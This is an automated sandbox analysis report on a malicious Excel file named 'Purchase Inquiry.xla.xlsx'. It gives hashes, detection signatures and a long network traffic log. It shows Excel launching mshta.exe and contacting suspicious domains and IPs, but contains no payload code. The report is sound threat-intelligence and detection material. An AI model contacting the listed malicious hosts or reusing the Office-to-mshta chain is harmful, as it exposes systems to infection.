Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Inquiry.xla.xlsx

Overview

General Information

Sample name:Purchase Inquiry.xla.xlsx
Analysis ID:1636398
MD5:e3afcc72b9f65030bcee289cda558807
SHA1:2de4b10d11a2741ffa6c3943433184caa9eef6d2
SHA256:d106446ba75a9d3612477acd3ef7c5c5b172709196d6e2962ecfabfb10e04132
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7116 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7676 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 7736 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 8032 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Purchase Inquiry.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7116, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7676, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 104.21.68.120, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7116, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49700
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.10, DestinationIsIpv6: false, DestinationPort: 49700, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7116, Protocol: tcp, SourceIp: 104.21.68.120, SourceIsIpv6: false, SourcePort: 443
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-12T18:30:43.865876+010020283713Unknown Traffic192.168.2.104970513.107.246.67443TCP
2025-03-12T18:30:55.340504+010020283713Unknown Traffic192.168.2.104970613.107.246.67443TCP
2025-03-12T18:30:55.429382+010020283713Unknown Traffic192.168.2.104970713.107.246.67443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Purchase Inquiry.xla.xlsxAvira: detected
Source: Purchase Inquiry.xla.xlsxVirustotal: Detection: 26%Perma Link
Source: Purchase Inquiry.xla.xlsxReversingLabs: Detection: 39%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 104.21.68.120:443 -> 192.168.2.10:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.39.89.152:443 -> 192.168.2.10:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.67:443 -> 192.168.2.10:49705 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: arnogo.net
Source: global trafficDNS query: name: link.saja.market
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49703 -> 104.168.7.38:80
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 104.21.68.120:443 -> 192.168.2.10:49700
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 104.21.68.120:443 -> 192.168.2.10:49700
Source: global trafficTCP traffic: 104.21.68.120:443 -> 192.168.2.10:49700
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 104.21.68.120:443 -> 192.168.2.10:49700
Source: global trafficTCP traffic: 104.21.68.120:443 -> 192.168.2.10:49700
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 104.21.68.120:443 -> 192.168.2.10:49700
Source: global trafficTCP traffic: 104.21.68.120:443 -> 192.168.2.10:49700
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 104.21.68.120:443 -> 192.168.2.10:49700
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 104.21.68.120:443 -> 192.168.2.10:49700
Source: global trafficTCP traffic: 192.168.2.10:49700 -> 104.21.68.120:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.10:49702
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.10:49702
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.10:49702
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.10:49702
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.10:49702
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.10:49702
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.10:49702
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.10:49702
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.10:49702
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.10:49703 -> 104.168.7.38:80
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 192.168.2.10:49703 -> 104.168.7.38:80
Source: global trafficTCP traffic: 192.168.2.10:49703 -> 104.168.7.38:80
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 192.168.2.10:49703 -> 104.168.7.38:80
Source: global trafficTCP traffic: 192.168.2.10:49703 -> 104.168.7.38:80
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 192.168.2.10:49703 -> 104.168.7.38:80
Source: global trafficTCP traffic: 192.168.2.10:49703 -> 104.168.7.38:80
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 192.168.2.10:49703 -> 104.168.7.38:80
Source: global trafficTCP traffic: 192.168.2.10:49703 -> 104.168.7.38:80
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.10:49703
Source: global trafficTCP traffic: 192.168.2.10:49703 -> 104.168.7.38:80
Source: global trafficTCP traffic: 192.168.2.10:49703 -> 104.168.7.38:80
Source: global trafficTCP traffic: 192.168.2.10:49703 -> 104.168.7.38:80
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
